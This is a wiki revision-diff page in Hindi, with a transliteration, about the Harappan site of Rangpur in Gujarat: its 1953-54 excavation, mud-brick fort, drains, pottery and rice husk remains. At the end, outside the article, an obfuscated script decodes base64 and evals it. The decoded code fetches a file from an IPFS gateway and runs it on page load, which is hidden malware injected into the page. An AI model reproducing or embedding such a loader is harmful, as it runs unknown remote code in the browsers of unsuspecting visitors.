Difference between revisions of "रंगपुर (गुजरात)"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "===संबंधित लेख==" to "==संबंधित लेख==")
m (Text replace - "यहां" to "यहाँ")
Line 1: Line 1:
 
*[[गुजरात]] के [[कठियावाड़]] प्राय:द्वीप में [[भादर नदी]] के समीप स्थित इस स्थल की खुदाई 1953-54 में 'ए. रंगनाथ राव' द्वारा की गई।  
 
*[[गुजरात]] के [[कठियावाड़]] प्राय:द्वीप में [[भादर नदी]] के समीप स्थित इस स्थल की खुदाई 1953-54 में 'ए. रंगनाथ राव' द्वारा की गई।  
 
*यहाँ पर पूर्व हडप्पा कालीन सस्कृति के अवशेष मिले हैं।  
 
*यहाँ पर पूर्व हडप्पा कालीन सस्कृति के अवशेष मिले हैं।  
*यहां मिले कच्ची ईटों के दुर्ग, नालियां, मृदभांड, बांट, पत्थर के फलक आदि महत्वपूर्ण हैं।  
+
*यहाँ मिले कच्ची ईटों के दुर्ग, नालियां, मृदभांड, बांट, पत्थर के फलक आदि महत्वपूर्ण हैं।  
*यहां धान की भूसी के ढेर मिले हैं।  
+
*यहाँ धान की भूसी के ढेर मिले हैं।  
*यहां उत्तरोत्तर [[हड़प्पा संस्कृति]] के साक्ष्य मिलते हैं।
+
*यहाँ उत्तरोत्तर [[हड़प्पा संस्कृति]] के साक्ष्य मिलते हैं।
  
  

Revision as of 11:43, 26 September 2010

  • gujarat ke kathiyava d pray:dvip mean bhadar nadi ke samip sthit is sthal ki khudaee 1953-54 mean 'e. ranganath rav' dvara ki gee.
  • yahaan par poorv hadappa kalin saskriti ke avashesh mile haian.
  • yahaan mile kachchi eetoan ke durg, naliyaan, mridabhaand, baant, patthar ke phalak adi mahatvapoorn haian.
  • yahaan dhan ki bhoosi ke dher mile haian.
  • yahaan uttarottar h dappa sanskriti ke sakshy milate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>